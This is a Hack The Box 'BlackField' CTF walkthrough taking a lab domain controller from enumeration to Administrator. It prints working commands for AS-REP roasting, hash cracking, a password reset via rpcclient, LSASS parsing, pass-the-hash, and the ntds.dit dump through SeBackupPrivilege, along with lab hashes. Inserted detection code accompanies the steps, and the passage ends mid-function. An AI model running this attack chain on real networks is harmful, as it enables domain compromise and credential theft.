
Hack The Box: BlackField Walkthrough (Japanese)

Posted at 2020-10-03

Note

This walkthrough is an article intended to explain the Hack The Box (hereafter HTB) machine BlackField. It is not intended to encourage illegal activity such as unauthorized access.

Introduction

A Hard-rated Windows box. Rated 4.9 and Staff Picked; a god-tier machine.
I used just about every Windows-environment tool I know on it. This is the first time I've been this excited while attacking a machine.

infocard

[Screenshot: BlackField info card]

Walkthrough

Getting user

Enumeration with autorecon

Useful information from the files I checked is recorded below.

  • _quick_tcp_nmap.txt

Missing an open port is a pain, so for this one step I also port-scanned with a separate tool and confirmed the results matched.

PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain?       syn-ack
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2020-07-23 14:48:15Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=9%D=7/23%Time=5F193FD4%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

  • enum4linux.txt

The domain name appears to be "BLACKFIELD".

Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
  • smbclient.txt

Folders named like user accounts have been created in profiles$. This looks usable as a user list.

$cat smbclient.txt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share

# Permissions
[+] Guest session       IP: blackfield:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

# Contents of profiles$
        profiles$                                               READ ONLY
        .\profiles$\*
        dr--r--r--                0 Thu Jun  4 01:47:12 2020    .
        dr--r--r--                0 Thu Jun  4 01:47:12 2020    ..
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AAlleni
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    ABarteski
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    ABekesz
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    ABenzies
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    ABiemiller
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AChampken
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    ACheretei
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    ACsonaki
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AHigchens
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AJaquemai
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AKlado
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AKoffenburger
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AKollolli
        dr--r--r--                0 Thu Jun  4 01:47:11 2020    AKruppe
...(a long list of what look like user folders continues)

ASREPRoast using the user list

Now that we have the user list, try ASREPRoast.
Beforehand, obtain the folder listing with smbclient or similar and reshape it into one name per line with something like cat list.txt | awk '{print $8}' > users.txt (the eighth field of the smbclient listing is the folder name).

GetNPUsers.py BLACKFIELD/ -format hashcat -usersfile users.txt -outputfile result.hash -dc-ip blackfield

~(snip)~
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
~(snip)~
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
~(snip)~

cat result.hash
$krb5asrep$23$support@BLACKFIELD:e24d006507629a228d3e40e6460b8a2e$e7d75ebe4697d9739263117cf43bba6c4a6b5b107b00ea284265e7ad949756ec84420a81c6013ba23d84d750bb5fb024f9e84f4fe234916ae61a5a9b64483e7d199c54d1496e871012e480f56b1e34e816f44a7228c03e0061668afdb16b9ae70cc97d08e5f6484380ef927d78bd7e459e24c077ef792383f3e535d574264c996787672d2129b2fa7706f3318dc5d47de3746803669f22a94f13d61dec97fb29bd4e76f21c96740ccfd36e2b0623ea52a97d4ecb882da1b130e87fca8e6e06e1a51dc22123b0e8ebe5684966d0a7ed1fbd704c3214f320b26ff2e7d0a7e411d0cb5b55038bb9a6469fe79d4cbeb5

A hash is found: the support account has pre-authentication disabled, so the KDC handed out an AS-REP encrypted with that account's password-derived key.
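From the defender's side, the two things worth having for this step are an audit of which accounts carry the DONT_REQUIRE_PREAUTH flag (the setting GetNPUsers.py tests for) and a detection over Security event 4768 for TGTs issued without pre-authentication. The following is an added example, not part of the original walkthrough or of impacket; the user records, the 4768 event fields and the IP addresses are constructed samples, and the parse_asrep_hash helper only splits the hashcat line format shown above into its parts.

```python
"""Defender-side checks for the AS-REP roasting step (added example, not
from the original walkthrough). Sample users and events are constructed."""

# userAccountControl bits (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed (sAMAccountName, userAccountControl) pairs, as an LDAP pull would return them.
SAMPLE_USERS = [
    ("support",    0x400200),  # NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH: roastable
    ("audit2020",  0x000200),  # NORMAL_ACCOUNT only
    ("svc_backup", 0x010200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("olduser",    0x400202),  # flag set but account disabled: the KDC refuses anyway
]


def audit_preauth_disabled(users, include_disabled=False):
    """Return accounts whose UAC has DONT_REQUIRE_PREAUTH set.

    Clearing the flag on every account that does not genuinely need it
    removes the exposure; disabled accounts are skipped unless asked for.
    """
    hits = []
    for name, uac in users:
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return hits


def parse_asrep_hash(line):
    """Split a hashcat-format line ($krb5asrep$<etype>$user@REALM:checksum$enc)
    into its parts so an analyst can see which account and encryption type a
    recovered artifact refers to. Etype 23 is RC4-HMAC, the cheap-to-crack case."""
    parts = line.split("$")
    # parts: ['', 'krb5asrep', '23', 'user@REALM:checksum', 'encdata']
    if len(parts) != 5 or parts[1] != "krb5asrep":
        raise ValueError("not an AS-REP hash line")
    principal, checksum = parts[3].split(":", 1)
    user, realm = principal.split("@", 1)
    return {"etype": int(parts[2]), "user": user, "realm": realm,
            "checksum": checksum, "enc_part": parts[4]}


# Constructed Security event 4768 (Kerberos TGT requested) records.
# PreAuthType 0 = no pre-authentication performed, TicketEncryptionType 0x17 =
# RC4-HMAC, Status 0x0 = TGT issued, Status 0x19 = KDC_ERR_PREAUTH_REQUIRED.
SAMPLE_4768 = [
    {"TargetUserName": "support",    "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0",  "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "audit2020",  "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0",  "IpAddress": "::ffff:10.10.10.50"},
    {"TargetUserName": "svc_backup", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x19", "IpAddress": "::ffff:10.10.14.5"},
]


def find_asrep_roast(events, rc4_only=True):
    """Flag 4768 events where a TGT was issued with no pre-authentication.

    A 0x19 failure means pre-auth is enforced and the requester got nothing
    crackable, so only Status 0x0 together with PreAuthType 0 counts.
    """
    hits = []
    for e in events:
        if e["PreAuthType"] != "0" or e["Status"] != "0x0":
            continue
        if rc4_only and e["TicketEncryptionType"].lower() != "0x17":
            continue
        hits.append((e["TargetUserName"], e["IpAddress"]))
    return hits
```

Run audit_preauth_disabled over a real userAccountControl export to find the accounts to fix, and feed find_asrep_roast 4768 records from the DC's Security log; the svc_backup sample shows why the status code matters, since a pre-auth-required failure is noise, not a roast.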

Dictionary attack with hashcat

With the hash in hand, run a dictionary attack to recover the plaintext password.
Pick a suitable wordlist and wait a little.

hashcat -m18200 '$krb5asrep$23$support@BLACKFIELD:e24d006507629a228d3e40e6460b8a2e$e7d75ebe4697d9739263117cf43bba6c4a6b5b107b00ea284265e7ad949756ec84420a81c6013ba23d84d750bb5fb024f9e84f4fe234916ae61a5a9b64483e7d199c54d1496e871012e480f56b1e34e816f44a7228c03e0061668afdb16b9ae70cc97d08e5f6484380ef927d78bd7e459e24c077ef792383f3e535d574264c996787672d2129b2fa7706f3318dc5d47de3746803669f22a94f13d61dec97fb29bd4e76f21c96740ccfd36e2b0623ea52a97d4ecb882da1b130e87fca8e6e06e1a51dc22123b0e8ebe5684966d0a7ed1fbd704c3214f320b26ff2e7d0a7e411d0cb5b55038bb9a6469fe79d4cbeb5'  -a 0 /usr/share/wordlists/rockyou.txt -o result.txt

~(snip)~

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$support@BLACKFIELD:e24d006507629a228d...4cbeb5
Time.Started.....: Sun Aug 30 16:40:19 2020 (17 secs)
Time.Estimated...: Sun Aug 30 16:40:36 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   832.5 kH/s (8.73ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14340096/14344385 (99.97%)
Rejected.........: 0/14340096 (0.00%)
Restore.Point....: 14327808/14344385 (99.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $Cah$ -> !carragold!

cat result.txt
$krb5asrep$23$support@BLACKFIELD:e24d006507629a228d3e40e6460b8a2e$e7d75ebe4697d9739263117cf43bba6c4a6b5b107b00ea284265e7ad949756ec84420a81c6013ba23d84d750bb5fb024f9e84f4fe234916ae61a5a9b64483e7d199c54d1496e871012e480f56b1e34e816f44a7228c03e0061668afdb16b9ae70cc97d08e5f6484380ef927d78bd7e459e24c077ef792383f3e535d574264c996787672d2129b2fa7706f3318dc5d47de3746803669f22a94f13d61dec97fb29bd4e76f21c96740ccfd36e2b0623ea52a97d4ecb882da1b130e87fca8e6e06e1a51dc22123b0e8ebe5684966d0a7ed1fbd704c3214f320b26ff2e7d0a7e411d0cb5b55038bb9a6469fe79d4cbeb5:#00^BlackKnight

support's password turns out to be #00^BlackKnight. However, this account cannot log in via WinRM, so another approach is needed.

Enumeration with the support account

Re-enumerate everything with this account. SYSVOL, which we had no access to before, now shows READ ONLY. Clearly suspicious.

SMB enumeration

smbmap -H blackfield -u support -p '#00^BlackKnight' -d BLACKFIELD

[+] IP: blackfield:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

Connect with smbclient and download the contents for now.
I initially set the target to blackfield, but that didn't work, so it ended up like this. Why?

smbclient //dc01.blackfield.local/SYSVOL -U blackfield.local/support
Enter BLACKFIELD.LOCAL\support's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 20:13:05 2020
  ..                                  D        0  Sun Feb 23 20:13:05 2020
  BLACKFIELD.local                   Dr        0  Sun Feb 23 20:13:05 2020
mg
                7846143 blocks of size 4096. 3836818 blocks available
smb: \> mget *
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \BLACKFIELD.local\DfsrPrivate\*
getting file \BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 22 as GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (1.5 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2796 as Registry.pol (3.9 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.0 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3764 as GptTmpl.inf (4.5 KiloBytes/sec) (average 2.1 KiloBytes/sec)
smb: \> exit

I looked through the contents but couldn't make sense of them. I burned an endless amount of time here.

RPC enumeration

Honestly, I still don't really understand RPC.
But after Googling like mad and reading through forums, the prominent suggestion was something like "maybe a service-desk-style account can change other users' passwords?" Try it while pulling information via RPC.

rpcclient -U support 10.10.10.192

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
~(snip)~
user:[BLACKFIELD532412] rid:[0x581]
user:[BLACKFIELD996878] rid:[0x582]
user:[BLACKFIELD653097] rid:[0x583]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]

rpcclient $> setuserinfo2 audit2020 23 '#i98jO093jlsi38'
rpcclient $> exit

Seems to have worked.

Enumeration with the audit2020 account

Since we now know audit2020's password can be changed at will, continue enumerating with this account. With 2020 in the account name, it looks like a temporary account.
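Resetting another user's password through SAMR, as rpcclient's setuserinfo2 does above, requires the "Reset Password" (User-Force-Change-Password) extended right on the target object, and the DC records each reset as Security event 4724 with the resetting account as subject and the reset account as target. The following is an added example, not part of the original walkthrough, showing how to audit ACEs for that right and how to flag resets performed by accounts outside an expected set; the ACEs, the events and the allowlists are constructed assumptions.

```python
"""Checks for the password-reset step (added example, not from the original
walkthrough). Sample ACEs and events are constructed for illustration."""

# AD access-mask bits and the rightsGuid of the "Reset Password" extended right
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100       # every extended right when no object type is given
ADS_RIGHT_GENERIC_ALL = 0x10000000
USER_FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"

# Constructed ACEs on user objects: (trustee, access_mask, object_type_guid, target DN)
SAMPLE_ACES = [
    ("BLACKFIELD\\Domain Admins", 0xF01FF, None,
     "CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local"),        # full control, expected
    ("BLACKFIELD\\support", ADS_RIGHT_DS_CONTROL_ACCESS, USER_FORCE_CHANGE_PASSWORD_GUID,
     "CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local"),        # explicit reset right, unexpected
    ("BLACKFIELD\\support", 0x10, None,
     "CN=lydericlefebvre,CN=Users,DC=BLACKFIELD,DC=local"),  # read-property only
]


def grants_reset_password(access_mask, object_type_guid):
    """True if this ACE lets the trustee reset the target's password."""
    if access_mask & ADS_RIGHT_GENERIC_ALL:
        return True
    if access_mask & ADS_RIGHT_DS_CONTROL_ACCESS:
        # control-access with no object type covers all extended rights, reset included
        return object_type_guid is None or object_type_guid.lower() == USER_FORCE_CHANGE_PASSWORD_GUID
    return False


def find_reset_password_grants(aces, expected_trustees):
    """Return (trustee, target) for reset-password grants held by unexpected trustees."""
    expected = {t.lower() for t in expected_trustees}
    return [(trustee, target) for trustee, mask, guid, target in aces
            if grants_reset_password(mask, guid) and trustee.lower() not in expected]


# Constructed Security event 4724 ("An attempt was made to reset an account's password").
SAMPLE_4724 = [
    {"SubjectUserName": "Administrator", "TargetUserName": "lydericlefebvre"},
    {"SubjectUserName": "support",       "TargetUserName": "audit2020"},
    {"SubjectUserName": "audit2020",     "TargetUserName": "audit2020"},
]


def find_unexpected_resets(events, allowed_resetters):
    """Flag resets where the subject is neither an allowed resetter nor the target itself."""
    allowed = {a.lower() for a in allowed_resetters}
    hits = []
    for e in events:
        subj, tgt = e["SubjectUserName"], e["TargetUserName"]
        if subj.lower() in allowed or subj.lower() == tgt.lower():
            continue
        hits.append((subj, tgt))
    return hits
```

The ACL audit is the preventive check (remove or justify the grant before it is used); the 4724 detection is the reactive one, and a reset of an audit account by a support account is exactly the kind of pairing it should surface.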

smbmap -H blackfield -u audit2020 -p '#i98jO093jlsi38' -d BLACKFIELD
[+] IP: blackfield:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

The forensic share is now READ ONLY, so go and check it.

smbclient //blackfield/forensic -U blackfield/audit2020
Enter BLACKFIELD\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 22:03:16 2020
  ..                                  D        0  Sun Feb 23 22:03:16 2020
  commands_output                     D        0  Mon Feb 24 03:14:37 2020
  memory_analysis                     D        0  Fri May 29 05:28:33 2020
  tools                               D        0  Sun Feb 23 22:39:08 2020

                7846143 blocks of size 4096. 3938851 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (1.5 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (24.8 KiloBytes/sec) (average 9.1 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (347.8 KiloBytes/sec) (average 154.4 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (2.7 KiloBytes/sec) (average 130.2 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (5.8 KiloBytes/sec) (average 113.0 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (6.0 KiloBytes/sec) (average 100.1 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (6.9 KiloBytes/sec) (average 90.0 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (15.2 KiloBytes/sec) (average 82.8 KiloBytes/sec)
~(snip)~

Investigating the dump files

The forensic share seems to contain various dump files and investigation results. Among them, memory_analysis/lsass.zip looks promising. A memory dump of lsass.exe can be parsed with mimikatz-style tools (pypykatz is used below), so try it.

cd memory_analysis
unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP

pypykatz lsa minidump ./lsass.DMP
FILE: ======== ./lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
        == SSP [633ba]==
                username
                domainname
                password None
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
                Password: None
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None

It works beautifully. This gives us svc_backup's NTLM hash, so Pass-the-Hash.

ruby evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i blackfield

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ../Desktop/user.txt

That gets us user!

Getting Administrator

The user we obtained is svc_backup, so this is clearly about abusing backup-related privileges. Running whoami /priv shows backup-related privileges are assigned.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

So after Googling a lot, several things became clear, and I proceed with the following plan.

  • Ultimately, being able to back up and restore means every file on Windows can be read and written.
  • In that case, dump ntds.dit, the Active Directory database file, and extract Administrator's information from it.
  • ntds.dit normally can't even be read (it is held open by the directory service), so abuse the backup privilege and dump it via a shadow copy.

Creating the shadow copy

$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i blackfield

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload script.txt
Info: Uploading script.txt to C:\Users\svc_backup\Documents\script.txt


Data: 288 bytes of 288 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> type script.txt
{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup
}
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  10/2/2020 2:07:07 PM

->
-> set context persistent nowriters
-> set metadata c:\windows\system32\spool\drivers\color\example.cab
-> set verbose on
-> begin backup
-> add volume c: alias mydrive
->
-> create

Alias mydrive for shadow ID {1e9682b9-2eb9-4789-a991-cfb50c6a1547} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {175322cf-2057-4d71-9b3c-7a19a230b712} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis6345.tmp into .cab file example.cab

Querying all shadow copies with the shadow copy set ID {175322cf-2057-4d71-9b3c-7a19a230b712}

	* Shadow copy ID = {1e9682b9-2eb9-4789-a991-cfb50c6a1547}		%mydrive%
		- Shadow copy set: {175322cf-2057-4d71-9b3c-7a19a230b712}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 10/2/2020 2:07:08 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: DC01.BLACKFIELD.local
		- Service machine: DC01.BLACKFIELD.local
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
->
-> expose %mydrive% w:
-> %mydrive% = {1e9682b9-2eb9-4789-a991-cfb50c6a1547}
The shadow copy was successfully exposed as w:\.
-> end backup
->
->

Obtaining ntds.dit

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll


Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeUtils.dll
Info: Uploading SeBackupPrivilegeUtils.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll


Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\svc_backup\Documents\ntds.dit -Overwrite

Obtaining the registry (SYSTEM hive, needed for the boot key)

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSTEM c:\Users\svc_backup\Documents\system.hive
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls


    Directory: C:\Users\svc_backup\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2020   2:11 PM       18874368 ntds.dit ← download this file
-a----        10/2/2020   2:06 PM            217 script.txt
-a----        10/2/2020   2:09 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        10/2/2020   2:09 PM          16384 SeBackupPrivilegeUtils.dll
-a----        10/2/2020   2:12 PM       17547264 system.hive ← download this file

Dump the credentials with impacket-secretsdump

impacket-secretsdump -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile output.txt
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
~(snip)~

Administrator's NTLM hash is revealed, so Pass-the-Hash.

evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i blackfield

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
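Everything from the whoami /priv output down to the secretsdump run is one chain: a logon that receives SeBackupPrivilege and SeRestorePrivilege, a scripted diskshadow run, reg save of the SYSTEM hive, and a copy of ntds.dit. Each step leaves a Security log trace, so as an added example (not part of the original walkthrough) here is detection logic over constructed samples of event 4672 (special privileges assigned to a new logon) and event 4688 (process creation with command-line auditing enabled); the allowlist, the rule names and the sample accounts are assumptions.

```python
"""Detection for the SeBackupPrivilege -> diskshadow -> ntds.dit chain
(added example, not from the original walkthrough). Sample events are
constructed to look like Windows Security log fields."""
import re

BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Constructed 4672 ("Special privileges assigned to new logon") records.
# PrivilegeList is whitespace-separated in the real event.
SAMPLE_4672 = [
    {"SubjectUserName": "Administrator",
     "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege"},
    {"SubjectUserName": "svc_backup",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"SubjectUserName": "DC01$",
     "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeTcbPrivilege"},
]


def privileged_logons_outside_allowlist(events, allowed_accounts):
    """4672 fires on every logon that receives a sensitive privilege, so narrow
    it to backup/restore rights held by accounts not expected to have them."""
    allowed = {a.lower() for a in allowed_accounts}
    hits = []
    for e in events:
        privs = set(re.split(r"\s+", e["PrivilegeList"].strip()))
        held = privs & BACKUP_PRIVS
        if held and e["SubjectUserName"].lower() not in allowed:
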